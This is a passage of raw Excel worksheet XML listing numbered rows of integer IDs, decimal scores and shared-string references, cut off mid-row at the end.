    <row r="3400" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3400" s="1">
        <v>3398</v>
      </c>
      <c r="B3400">
        <v>4187</v>
      </c>
      <c r="C3400">
        <v>4187</v>
      </c>
      <c r="D3400">
        <v>2</v>
      </c>
      <c r="E3400">
        <v>0.99550002813339233</v>
      </c>
      <c r="F3400" t="s">
        <v>5592</v>
      </c>
      <c r="G3400" t="s">
        <v>6723</v>
      </c>
      <c r="H3400" t="s">
        <v>6724</v>
      </c>
    </row>
    <row r="3401" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3401" s="1">
        <v>3399</v>
      </c>
      <c r="B3401">
        <v>4189</v>
      </c>
      <c r="C3401">
        <v>4189</v>
      </c>
      <c r="D3401">
        <v>2</v>
      </c>
      <c r="E3401">
        <v>0.81150001287460327</v>
      </c>
      <c r="F3401" t="s">
        <v>5592</v>
      </c>
      <c r="G3401" t="s">
        <v>6725</v>
      </c>
      <c r="H3401" t="s">
        <v>6726</v>
      </c>
    </row>
    <row r="3402" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3402" s="1">
        <v>3400</v>
      </c>
      <c r="B3402">
        <v>5280</v>
      </c>
      <c r="C3402">
        <v>5280</v>
      </c>
      <c r="D3402">
        <v>2</v>
      </c>
      <c r="E3402">
        <v>0.99790000915527344</v>
      </c>
      <c r="F3402" t="s">
        <v>5592</v>
      </c>
      <c r="G3402" t="s">
        <v>6727</v>
      </c>
      <c r="H3402" t="s">
        <v>6728</v>
      </c>
    </row>
    <row r="3403" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3403" s="1">
        <v>3401</v>
      </c>
      <c r="B3403">
        <v>5285</v>
      </c>
      <c r="C3403">
        <v>5285</v>
      </c>
      <c r="D3403">
        <v>2</v>
      </c>
      <c r="E3403">
        <v>0.98849999904632568</v>
      </c>
      <c r="F3403" t="s">
        <v>5592</v>
      </c>
      <c r="G3403" t="s">
        <v>6729</v>
      </c>
      <c r="H3403" t="s">
        <v>6730</v>
      </c>
    </row>
    <row r="3404" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3404" s="1">
        <v>3402</v>
      </c>
      <c r="B3404">
        <v>4049</v>
      </c>
      <c r="C3404">
        <v>4049</v>
      </c>
      <c r="D3404">
        <v>2</v>
      </c>
      <c r="E3404">
        <v>0.77340000867843628</v>
      </c>
      <c r="F3404" t="s">
        <v>5592</v>
      </c>
      <c r="G3404" t="s">
        <v>6731</v>
      </c>
      <c r="H3404" t="s">
        <v>6732</v>
      </c>
    </row>
    <row r="3405" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3405" s="1">
        <v>3403</v>
      </c>
      <c r="B3405">
        <v>4166</v>
      </c>
      <c r="C3405">
        <v>4166</v>
      </c>
      <c r="D3405">
        <v>2</v>
      </c>
      <c r="E3405">
        <v>0.66850000619888306</v>
      </c>
      <c r="F3405" t="s">
        <v>5592</v>
      </c>
      <c r="G3405" t="s">
        <v>6733</v>
      </c>
      <c r="H3405" t="s">
        <v>6734</v>
      </c>
    </row>
    <row r="3406" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3406" s="1">
        <v>3404</v>
      </c>
      <c r="B3406">
        <v>6173</v>
      </c>
      <c r="C3406">
        <v>6173</v>
      </c>
      <c r="D3406">
        <v>2</v>
      </c>
      <c r="E3406">
        <v>0.69270002841949463</v>
      </c>
      <c r="F3406" t="s">
        <v>5592</v>
      </c>
      <c r="G3406" t="s">
        <v>6735</v>
      </c>
      <c r="H3406" t="s">
        <v>6736</v>
      </c>
    </row>
    <row r="3407" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3407" s="1">
        <v>3405</v>
      </c>
      <c r="B3407">
        <v>4127</v>
      </c>
      <c r="C3407">
        <v>4127</v>
      </c>
      <c r="D3407">
        <v>2</v>
      </c>
      <c r="E3407">
        <v>0.41260001063346857</v>
      </c>
      <c r="F3407" t="s">
        <v>5592</v>
      </c>
      <c r="G3407" t="s">
        <v>6737</v>
      </c>
      <c r="H3407" t="s">
        <v>6738</v>
      </c>
    </row>
    <row r="3408" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3408" s="1">
        <v>3406</v>
      </c>
      <c r="B3408">
        <v>5296</v>
      </c>
      <c r="C3408">
        <v>5296</v>
      </c>
      <c r="D3408">
        <v>2</v>
      </c>
      <c r="E3408">
        <v>0.99620002508163452</v>
      </c>
      <c r="F3408" t="s">
        <v>5592</v>
      </c>
      <c r="G3408" t="s">
        <v>6739</v>
      </c>
      <c r="H3408" t="s">
        <v>6740</v>
      </c>
    </row>
    <row r="3409" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3409" s="1">
        <v>3407</v>
      </c>
      <c r="B3409">
        <v>5295</v>
      </c>
      <c r="C3409">
        <v>5295</v>
      </c>
      <c r="D3409">
        <v>2</v>
      </c>
      <c r="E3409">
        <v>0.53460001945495605</v>
      </c>
      <c r="F3409" t="s">
        <v>5592</v>
      </c>
      <c r="G3409" t="s">
        <v>6741</v>
      </c>
      <c r="H3409" t="s">
        <v>6742</v>
      </c>
    </row>
    <row r="3410" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3410" s="1">
        <v>3408</v>
      </c>
      <c r="B3410">
        <v>4130</v>
      </c>
      <c r="C3410">
        <v>4130</v>
      </c>
      <c r="D3410">
        <v>2</v>
      </c>
      <c r="E3410">
        <v>0.80620002746582031</v>
      </c>
      <c r="F3410" t="s">
        <v>5592</v>
      </c>
      <c r="G3410" t="s">
        <v>6743</v>
      </c>
      <c r="H3410" t="s">
        <v>6744</v>
      </c>
    </row>
    <row r="3411" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3411" s="1">
        <v>3409</v>
      </c>
      <c r="B3411">
        <v>5292</v>
      </c>
      <c r="C3411">
        <v>5292</v>
      </c>
      <c r="D3411">
        <v>2</v>
      </c>
      <c r="E3411">
        <v>0.99550002813339233</v>
      </c>
      <c r="F3411" t="s">
        <v>5592</v>
      </c>
      <c r="G3411" t="s">
        <v>6745</v>
      </c>
      <c r="H3411" t="s">
        <v>6746</v>
      </c>
    </row>
    <row r="3412" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3412" s="1">
        <v>3410</v>
      </c>
      <c r="B3412">
        <v>6186</v>
      </c>
      <c r="C3412">
        <v>6186</v>
      </c>
      <c r="D3412">
        <v>2</v>
      </c>
      <c r="E3412">
        <v>0.9901999831199646</v>
      </c>
      <c r="F3412" t="s">
        <v>5592</v>
      </c>
      <c r="G3412" t="s">
        <v>6747</v>
      </c>
      <c r="H3412" t="s">
        <v>6748</v>
      </c>
    </row>
    <row r="3413" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3413" s="1">
        <v>3411</v>
      </c>
      <c r="B3413">
        <v>4135</v>
      </c>
      <c r="C3413">
        <v>4135</v>
      </c>
      <c r="D3413">
        <v>2</v>
      </c>
      <c r="E3413">
        <v>0.65289998054504395</v>
      </c>
      <c r="F3413" t="s">
        <v>5592</v>
      </c>
      <c r="G3413" t="s">
        <v>6749</v>
      </c>
      <c r="H3413" t="s">
        <v>5745</v>
      </c>
    </row>
    <row r="3414" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3414" s="1">
        <v>3412</v>
      </c>
      <c r="B3414">
        <v>4164</v>
      </c>
      <c r="C3414">
        <v>4164</v>
      </c>
      <c r="D3414">
        <v>2</v>
      </c>
      <c r="E3414">
        <v>0.97519999742507935</v>
      </c>
      <c r="F3414" t="s">
        <v>5592</v>
      </c>
      <c r="G3414" t="s">
        <v>6750</v>
      </c>
      <c r="H3414" t="s">
        <v>6751</v>
      </c>
    </row>
    <row r="3415" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3415" s="1">
        <v>3413</v>
      </c>
      <c r="B3415">
        <v>4136</v>
      </c>
      <c r="C3415">
        <v>4136</v>
      </c>
      <c r="D3415">
        <v>2</v>
      </c>
      <c r="E3415">
        <v>0.55199998617172241</v>
      </c>
      <c r="F3415" t="s">
        <v>5592</v>
      </c>
      <c r="G3415" t="s">
        <v>6752</v>
      </c>
      <c r="H3415" t="s">
        <v>6753</v>
      </c>
    </row>
    <row r="3416" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3416" s="1">
        <v>3414</v>
      </c>
      <c r="B3416">
        <v>4140</v>
      </c>
      <c r="C3416">
        <v>4140</v>
      </c>
      <c r="D3416">
        <v>2</v>
      </c>
      <c r="E3416">
        <v>0.42550000548362732</v>
      </c>
      <c r="F3416" t="s">
        <v>5592</v>
      </c>
      <c r="G3416" t="s">
        <v>6754</v>
      </c>
      <c r="H3416" t="s">
        <v>6755</v>
      </c>
    </row>
    <row r="3417" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3417" s="1">
        <v>3415</v>
      </c>
      <c r="B3417">
        <v>6182</v>
      </c>
      <c r="C3417">
        <v>6182</v>
      </c>
      <c r="D3417">
        <v>2</v>
      </c>
      <c r="E3417">
        <v>0.61309999227523804</v>
      </c>
      <c r="F3417" t="s">
        <v>5592</v>
      </c>
      <c r="G3417" t="s">
        <v>6756</v>
      </c>
      <c r="H3417" t="s">
        <v>6757</v>
      </c>
    </row>
    <row r="3418" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3418" s="1">
        <v>3416</v>
      </c>
      <c r="B3418">
        <v>4151</v>
      </c>
      <c r="C3418">
        <v>4151</v>
      </c>
      <c r="D3418">
        <v>2</v>
      </c>
      <c r="E3418">
        <v>0.71490001678466797</v>
      </c>
      <c r="F3418" t="s">
        <v>5592</v>
      </c>
      <c r="G3418" t="s">
        <v>6758</v>
      </c>
      <c r="H3418" t="s">
        <v>6759</v>
      </c>
    </row>
    <row r="3419" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3419" s="1">
        <v>3417</v>
      </c>
      <c r="B3419">
        <v>4152</v>
      </c>
      <c r="C3419">
        <v>4152</v>
      </c>
      <c r="D3419">
        <v>2</v>
      </c>
      <c r="E3419">
        <v>0.99260002374649048</v>
      </c>
      <c r="F3419" t="s">
        <v>5592</v>
      </c>
      <c r="G3419" t="s">
        <v>6760</v>
      </c>
      <c r="H3419" t="s">
        <v>6761</v>
      </c>
    </row>
    <row r="3420" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3420" s="1">
        <v>3418</v>
      </c>
      <c r="B3420">
        <v>4153</v>
      </c>
      <c r="C3420">
        <v>4153</v>
      </c>
      <c r="D3420">
        <v>2</v>
      </c>
      <c r="E3420">
        <v>0.99269998073577881</v>
      </c>
      <c r="F3420" t="s">
        <v>5592</v>
      </c>
      <c r="G3420" t="s">
        <v>6762</v>
      </c>
      <c r="H3420" t="s">
        <v>6763</v>
      </c>
    </row>
    <row r="3421" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3421" s="1">
        <v>3419</v>
      </c>
      <c r="B3421">
        <v>4154</v>
      </c>
      <c r="C3421">
        <v>4154</v>
      </c>
      <c r="D3421">
        <v>2</v>
      </c>
      <c r="E3421">
        <v>0.46209999918937678</v>
      </c>
      <c r="F3421" t="s">
        <v>5592</v>
      </c>
      <c r="G3421" t="s">
        <v>6764</v>
      </c>
      <c r="H3421" t="s">
        <v>6765</v>
      </c>
    </row>
    <row r="3422" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3422" s="1">
        <v>3420</v>
      </c>
      <c r="B3422">
        <v>4155</v>
      </c>
      <c r="C3422">
        <v>4155</v>
      </c>
      <c r="D3422">
        <v>2</v>
      </c>
      <c r="E3422">
        <v>0.9814000129699707</v>
      </c>
      <c r="F3422" t="s">
        <v>5592</v>
      </c>
      <c r="G3422" t="s">
        <v>6766</v>
      </c>
      <c r="H3422" t="s">
        <v>6767</v>
      </c>
    </row>
    <row r="3423" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3423" s="1">
        <v>3421</v>
      </c>
      <c r="B3423">
        <v>4138</v>
      </c>
      <c r="C3423">
        <v>4138</v>
      </c>
      <c r="D3423">
        <v>2</v>
      </c>
      <c r="E3423">
        <v>0.99839997291564941</v>
      </c>
      <c r="F3423" t="s">
        <v>5592</v>
      </c>
      <c r="G3423" t="s">
        <v>6768</v>
      </c>
      <c r="H3423" t="s">
        <v>6769</v>
      </c>
    </row>
    <row r="3424" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3424" s="1">
        <v>3422</v>
      </c>
      <c r="B3424">
        <v>4192</v>
      </c>
      <c r="C3424">
        <v>4192</v>
      </c>
      <c r="D3424">
        <v>2</v>
      </c>
      <c r="E3424">
        <v>0.81430000066757202</v>
      </c>
      <c r="F3424" t="s">
        <v>5592</v>
      </c>
      <c r="G3424" t="s">
        <v>6770</v>
      </c>
      <c r="H3424" t="s">
        <v>6771</v>
      </c>
    </row>
    <row r="3425" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3425" s="1">
        <v>3423</v>
      </c>
      <c r="B3425">
        <v>5696</v>
      </c>
      <c r="C3425">
        <v>5696</v>
      </c>
      <c r="D3425">
        <v>2</v>
      </c>
      <c r="E3425">
        <v>0.62510001659393311</v>
      </c>
      <c r="F3425" t="s">
        <v>5592</v>
      </c>
      <c r="G3425" t="s">
        <v>6772</v>
      </c>
      <c r="H3425" t="s">
        <v>6773</v>
      </c>
    </row>
    <row r="3426" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3426" s="1">
        <v>3424</v>
      </c>
      <c r="B3426">
        <v>4047</v>
      </c>
      <c r="C3426">
        <v>4047</v>
      </c>
      <c r="D3426">
        <v>2</v>
      </c>
      <c r="E3426">
        <v>0.83649998903274536</v>
      </c>
      <c r="F3426" t="s">
        <v>5592</v>
      </c>
      <c r="G3426" t="s">
        <v>6774</v>
      </c>
      <c r="H3426" t="s">
        <v>6775</v>
      </c>
    </row>
    <row r="3427" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3427" s="1">
        <v>3425</v>
      </c>
      <c r="B3427">
        <v>5679</v>
      </c>
      <c r="C3427">
        <v>5679</v>
      </c>
      <c r="D3427">
        <v>2</v>
      </c>
      <c r="E3427">
        <v>0.60699999332427979</v>
      </c>
      <c r="F3427" t="s">
        <v>5592</v>
      </c>
      <c r="G3427" t="s">
        <v>6776</v>
      </c>
      <c r="H3427" t="s">
        <v>6777</v>
      </c>
    </row>
    <row r="3428" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3428" s="1">
        <v>3426</v>
      </c>
      <c r="B3428">
        <v>5680</v>
      </c>
      <c r="C3428">
        <v>5680</v>
      </c>
      <c r="D3428">
        <v>2</v>
      </c>
      <c r="E3428">
        <v>0.99930000305175781</v>
      </c>
      <c r="F3428" t="s">
        <v>5592</v>
      </c>
      <c r="G3428" t="s">
        <v>6778</v>
      </c>
      <c r="H3428" t="s">
        <v>6779</v>
      </c>
    </row>
    <row r="3429" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3429" s="1">
        <v>3427</v>
      </c>
      <c r="B3429">
        <v>3978</v>
      </c>
      <c r="C3429">
        <v>3978</v>
      </c>
      <c r="D3429">
        <v>2</v>
      </c>
      <c r="E3429">
        <v>0.98589998483657837</v>
      </c>
      <c r="F3429" t="s">
        <v>5592</v>
      </c>
      <c r="G3429" t="s">
        <v>6780</v>
      </c>
      <c r="H3429" t="s">
        <v>6781</v>
      </c>
    </row>
    <row r="3430" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3430" s="1">
        <v>3428</v>
      </c>
      <c r="B3430">
        <v>3980</v>
      </c>
      <c r="C3430">
        <v>3980</v>
      </c>
      <c r="D3430">
        <v>2</v>
      </c>
      <c r="E3430">
        <v>0.68019998073577881</v>
      </c>
      <c r="F3430" t="s">
        <v>5592</v>
      </c>
      <c r="G3430" t="s">
        <v>6782</v>
      </c>
      <c r="H3430" t="s">
        <v>6783</v>
      </c>
    </row>
    <row r="3431" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3431" s="1">
        <v>3429</v>
      </c>
      <c r="B3431">
        <v>5682</v>
      </c>
      <c r="C3431">
        <v>5682</v>
      </c>
      <c r="D3431">
        <v>2</v>
      </c>
      <c r="E3431">
        <v>0.49919998645782471</v>
      </c>
      <c r="F3431" t="s">
        <v>5592</v>
      </c>
      <c r="G3431" t="s">
        <v>6784</v>
      </c>
      <c r="H3431" t="s">
        <v>6785</v>
      </c>
    </row>
    <row r="3432" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3432" s="1">
        <v>3430</v>
      </c>
      <c r="B3432">
        <v>5683</v>
      </c>
      <c r="C3432">
        <v>5683</v>
      </c>
      <c r="D3432">
        <v>2</v>
      </c>
      <c r="E3432">
        <v>0.83619999885559082</v>
      </c>
      <c r="F3432" t="s">
        <v>5592</v>
      </c>
      <c r="G3432" t="s">
        <v>6786</v>
      </c>
      <c r="H3432" t="s">
        <v>6787</v>
      </c>
    </row>
    <row r="3433" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3433" s="1">
        <v>3431</v>
      </c>
      <c r="B3433">
        <v>5684</v>
      </c>
      <c r="C3433">
        <v>5684</v>
      </c>
      <c r="D3433">
        <v>2</v>
      </c>
      <c r="E3433">
        <v>0.99089998006820679</v>
      </c>
      <c r="F3433" t="s">
        <v>5592</v>
      </c>
      <c r="G3433" t="s">
        <v>6788</v>
      </c>
      <c r="H3433" t="s">
        <v>6789</v>
      </c>
    </row>
    <row r="3434" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3434" s="1">
        <v>3432</v>
      </c>
      <c r="B3434">
        <v>5685</v>
      </c>
      <c r="C3434">
        <v>5685</v>
      </c>
      <c r="D3434">
        <v>2</v>
      </c>
      <c r="E3434">
        <v>0.99949997663497925</v>
      </c>
      <c r="F3434" t="s">
        <v>5592</v>
      </c>
      <c r="G3434" t="s">
        <v>6790</v>
      </c>
      <c r="H3434" t="s">
        <v>6791</v>
      </c>
    </row>
    <row r="3435" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3435" s="1">
        <v>3433</v>
      </c>
      <c r="B3435">
        <v>3984</v>
      </c>
      <c r="C3435">
        <v>3984</v>
      </c>
      <c r="D3435">
        <v>2</v>
      </c>
      <c r="E3435">
        <v>0.98839998245239258</v>
      </c>
      <c r="F3435" t="s">
        <v>5592</v>
      </c>
      <c r="G3435" t="s">
        <v>6792</v>
      </c>
      <c r="H3435" t="s">
        <v>6793</v>
      </c>
    </row>
    <row r="3436" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3436" s="1">
        <v>3434</v>
      </c>
      <c r="B3436">
        <v>3985</v>
      </c>
      <c r="C3436">
        <v>3985</v>
      </c>
      <c r="D3436">
        <v>2</v>
      </c>
      <c r="E3436">
        <v>0.99470001459121704</v>
      </c>
      <c r="F3436" t="s">
        <v>5592</v>
      </c>
      <c r="G3436" t="s">
        <v>6794</v>
      </c>
      <c r="H3436" t="s">
        <v>6795</v>
      </c>
    </row>
    <row r="3437" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3437" s="1">
        <v>3435</v>
      </c>
      <c r="B3437">
        <v>3986</v>
      </c>
      <c r="C3437">
        <v>3986</v>
      </c>
      <c r="D3437">
        <v>2</v>
      </c>
      <c r="E3437">
        <v>0.98640000820159912</v>
      </c>
      <c r="F3437" t="s">
        <v>5592</v>
      </c>
      <c r="G3437" t="s">
        <v>6796</v>
      </c>
      <c r="H3437" t="s">
        <v>6797</v>
      </c>
    </row>
    <row r="3438" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3438" s="1">
        <v>3436</v>
      </c>
      <c r="B3438">
        <v>3987</v>
      </c>
      <c r="C3438">
        <v>3987</v>
      </c>
      <c r="D3438">
        <v>2</v>
      </c>
      <c r="E3438">
        <v>0.5593000054359436</v>
      </c>
      <c r="F3438" t="s">
        <v>5592</v>
      </c>
      <c r="G3438" t="s">
        <v>6798</v>
      </c>
      <c r="H3438" t="s">
        <v>6799</v>
      </c>
    </row>
    <row r="3439" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3439" s="1">
        <v>3437</v>
      </c>
      <c r="B3439">
        <v>5351</v>
      </c>
      <c r="C3439">
        <v>5351</v>
      </c>
      <c r="D3439">
        <v>2</v>
      </c>
      <c r="E3439">
        <v>0.58279997110366821</v>
      </c>
      <c r="F3439" t="s">
        <v>5592</v>
      </c>
      <c r="G3439" t="s">
        <v>6800</v>
      </c>
      <c r="H3439" t="s">
        <v>6801</v>
      </c>
    </row>
    <row r="3440" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3440" s="1">
        <v>3438</v>
      </c>
      <c r="B3440">
        <v>3988</v>
      </c>
      <c r="C3440">
        <v>3988</v>
      </c>
      <c r="D3440">
        <v>2</v>
      </c>
      <c r="E3440">
        <v>0.99959999322891235</v>
      </c>
      <c r="F3440" t="s">
        <v>5592</v>
      </c>
      <c r="G3440" t="s">
        <v>6802</v>
      </c>
      <c r="H3440" t="s">
        <v>6803</v>
      </c>
    </row>
    <row r="3441" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3441" s="1">
        <v>3439</v>
      </c>
      <c r="B3441">
        <v>3989</v>
      </c>
      <c r="C3441">
        <v>3989</v>
      </c>
      <c r="D3441">
        <v>2</v>
      </c>
      <c r="E3441">
        <v>0.99959999322891235</v>
      </c>
      <c r="F3441" t="s">
        <v>5592</v>
      </c>
      <c r="G3441" t="s">
        <v>6804</v>
      </c>
      <c r="H3441" t="s">
        <v>6803</v>
      </c>
    </row>
    <row r="3442" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3442" s="1">
        <v>3440</v>
      </c>
      <c r="B3442">
        <v>5367</v>
      </c>
      <c r="C3442">
        <v>5367</v>
      </c>
      <c r="D3442">
        <v>2</v>
      </c>
      <c r="E3442">
        <v>0.99849998950958252</v>
      </c>
      <c r="F3442" t="s">
        <v>5592</v>
      </c>
      <c r="G3442" t="s">
        <v>6805</v>
      </c>
      <c r="H3442" t="s">
        <v>6806</v>
      </c>
    </row>
    <row r="3443" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3443" s="1">
        <v>3441</v>
      </c>
      <c r="B3443">
        <v>5368</v>
      </c>
      <c r="C3443">
        <v>5368</v>
      </c>
      <c r="D3443">
        <v>2</v>
      </c>
      <c r="E3443">
        <v>0.99849998950958252</v>
      </c>
      <c r="F3443" t="s">
        <v>5592</v>
      </c>
      <c r="G3443" t="s">
        <v>6807</v>
      </c>
      <c r="H3443" t="s">
        <v>6808</v>
      </c>
    </row>
    <row r="3444" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3444" s="1">
        <v>3442</v>
      </c>
      <c r="B3444">
        <v>6251</v>
      </c>
      <c r="C3444">
        <v>6251</v>
      </c>
      <c r="D3444">
        <v>2</v>
      </c>
      <c r="E3444">
        <v>0.98059999942779541</v>
      </c>
      <c r="F3444" t="s">
        <v>5592</v>
      </c>
      <c r="G3444" t="s">
        <v>6809</v>
      </c>
      <c r="H3444" t="s">
        <v>6810</v>
      </c>
    </row>
    <row r="3445" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3445" s="1">
        <v>3443</v>
      </c>
      <c r="B3445">
        <v>5369</v>
      </c>
      <c r="C3445">
        <v>5369</v>
      </c>
      <c r="D3445">
        <v>2</v>
      </c>
      <c r="E3445">
        <v>0.93800002336502075</v>
      </c>
      <c r="F3445" t="s">
        <v>5592</v>
      </c>
      <c r="G3445" t="s">
        <v>6811</v>
      </c>
      <c r="H3445" t="s">
        <v>6812</v>
      </c>
    </row>
    <row r="3446" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3446" s="1">
        <v>3444</v>
      </c>
      <c r="B3446">
        <v>3947</v>
      </c>
      <c r="C3446">
        <v>3947</v>
      </c>
      <c r="D3446">
        <v>2</v>
      </c>
      <c r="E3446">
        <v>0.97640001773834229</v>
      </c>
      <c r="F3446" t="s">
        <v>5592</v>
      </c>
      <c r="G3446" t="s">
        <v>6813</v>
      </c>
      <c r="H3446" t="s">
        <v>6814</v>
      </c>
    </row>
    <row r="3447" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3447" s="1">
        <v>3445</v>
      </c>
      <c r="B3447">
        <v>3948</v>
      </c>
      <c r="C3447">
        <v>3948</v>
      </c>
      <c r="D3447">
        <v>2</v>
      </c>
      <c r="E3447">
        <v>0.74290001392364502</v>
      </c>
      <c r="F3447" t="s">
        <v>5592</v>
      </c>
      <c r="G3447" t="s">
        <v>6815</v>
      </c>
      <c r="H3447" t="s">
        <v>6816</v>
      </c>
    </row>
    <row r="3448" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3448" s="1">
        <v>3446</v>
      </c>
      <c r="B3448">
        <v>6262</v>
      </c>
      <c r="C3448">
        <v>6262</v>
      </c>
      <c r="D3448">
        <v>2</v>
      </c>
      <c r="E3448">
        <v>0.98400002717971802</v>
      </c>
      <c r="F3448" t="s">
        <v>5592</v>
      </c>
      <c r="G3448" t="s">
        <v>6817</v>
      </c>
      <c r="H3448" t="s">
        <v>6818</v>
      </c>
    </row>
    <row r="3449" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3449" s="1">
        <v>3447</v>
      </c>
      <c r="B3449">
        <v>3950</v>
      </c>
      <c r="C3449">
        <v>3950</v>
      </c>
      <c r="D3449">
        <v>2</v>
      </c>
      <c r="E3449">
        <v>0.99769997596740723</v>
      </c>
      <c r="F3449" t="s">
        <v>5592</v>
      </c>
      <c r="G3449" t="s">
        <v>6819</v>
      </c>
      <c r="H3449" t="s">
        <v>6820</v>
      </c>
    </row>
    <row r="3450" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3450" s="1">
        <v>3448</v>
      </c>
      <c r="B3450">
        <v>3951</v>
      </c>
      <c r="C3450">
        <v>3951</v>
      </c>
      <c r="D3450">
        <v>2</v>
      </c>
      <c r="E3450">
        <v>0.88550001382827759</v>
      </c>
      <c r="F3450" t="s">
        <v>5592</v>
      </c>
      <c r="G3450" t="s">
        <v>6821</v>
      </c>
      <c r="H3450" t="s">
        <v>6280</v>
      </c>
    </row>
    <row r="3451" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3451" s="1">
        <v>3449</v>
      </c>
      <c r="B3451">
        <v>6261</v>
      </c>
      <c r="C3451">
        <v>6261</v>
      </c>
      <c r="D3451">
        <v>2</v>
      </c>
      <c r="E3451">
        <v>0.58609998226165771</v>
      </c>
      <c r="F3451" t="s">
        <v>5592</v>
      </c>
      <c r="G3451" t="s">
        <v>6822</v>
      </c>
      <c r="H3451" t="s">
        <v>6823</v>
      </c>
    </row>
    <row r="3452" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3452" s="1">
        <v>3450</v>
      </c>
      <c r="B3452">
        <v>6260</v>
      </c>
      <c r="C3452">
        <v>6260</v>
      </c>
      <c r="D3452">
        <v>2</v>
      </c>
      <c r="E3452">
        <v>0.99659997224807739</v>
      </c>
      <c r="F3452" t="s">
        <v>5592</v>
      </c>
      <c r="G3452" t="s">
        <v>6824</v>
      </c>
      <c r="H3452" t="s">
        <v>6825</v>
      </c>
    </row>
    <row r="3453" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3453" s="1">
        <v>3451</v>
      </c>
      <c r="B3453">
        <v>3992</v>
      </c>
      <c r="C3453">
        <v>3992</v>
      </c>
      <c r="D3453">
        <v>2</v>
      </c>
      <c r="E3453">
        <v>0.99419999122619629</v>
      </c>
      <c r="F3453" t="s">
        <v>5592</v>
      </c>
      <c r="G3453" t="s">
        <v>6826</v>
      </c>
      <c r="H3453" t="s">
        <v>6827</v>
      </c>
    </row>
    <row r="3454" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3454" s="1">
        <v>3452</v>
      </c>
      <c r="B3454">
        <v>6259</v>
      </c>
      <c r="C3454">
        <v>6259</v>
      </c>
      <c r="D3454">
        <v>2</v>
      </c>
      <c r="E3454">
        <v>0.99800002574920654</v>
      </c>
      <c r="F3454" t="s">
        <v>5592</v>
      </c>
      <c r="G3454" t="s">
        <v>6828</v>
      </c>
      <c r="H3454" t="s">
        <v>6829</v>
      </c>
    </row>
    <row r="3455" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3455" s="1">
        <v>3453</v>
      </c>
      <c r="B3455">
        <v>5375</v>
      </c>
      <c r="C3455">
        <v>5375</v>
      </c>
      <c r="D3455">
        <v>2</v>
      </c>
      <c r="E3455">
        <v>0.97200000286102295</v>
      </c>
      <c r="F3455" t="s">
        <v>5592</v>
      </c>
      <c r="G3455" t="s">
        <v>6830</v>
      </c>
      <c r="H3455" t="s">
        <v>6831</v>
      </c>
    </row>
    <row r="3456" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3456" s="1">
        <v>3454</v>
      </c>
      <c r="B3456">
        <v>5674</v>
      </c>
      <c r="C3456">
        <v>5674</v>
      </c>
      <c r="D3456">
        <v>2</v>
      </c>
      <c r="E3456">
        <v>0.75400000810623169</v>
      </c>
      <c r="F3456" t="s">
        <v>5592</v>
      </c>
      <c r="G3456" t="s">
        <v>6832</v>
      </c>
      <c r="H3456" t="s">
        <v>6833</v>
      </c>
    </row>
    <row r="3457" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3457" s="1">
        <v>3455</v>
      </c>
      <c r="B3457">
        <v>6253</v>
      </c>
      <c r="C3457">
        <v>6253</v>
      </c>
      <c r="D3457">
        <v>2</v>
      </c>
      <c r="E3457">
        <v>0.79420000314712524</v>
      </c>
      <c r="F3457" t="s">
        <v>5592</v>
      </c>
      <c r="G3457" t="s">
        <v>6834</v>
      </c>
      <c r="H3457" t="s">
        <v>6835</v>
      </c>
    </row>
    <row r="3458" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3458" s="1">
        <v>3456</v>
      </c>
      <c r="B3458">
        <v>6252</v>
      </c>
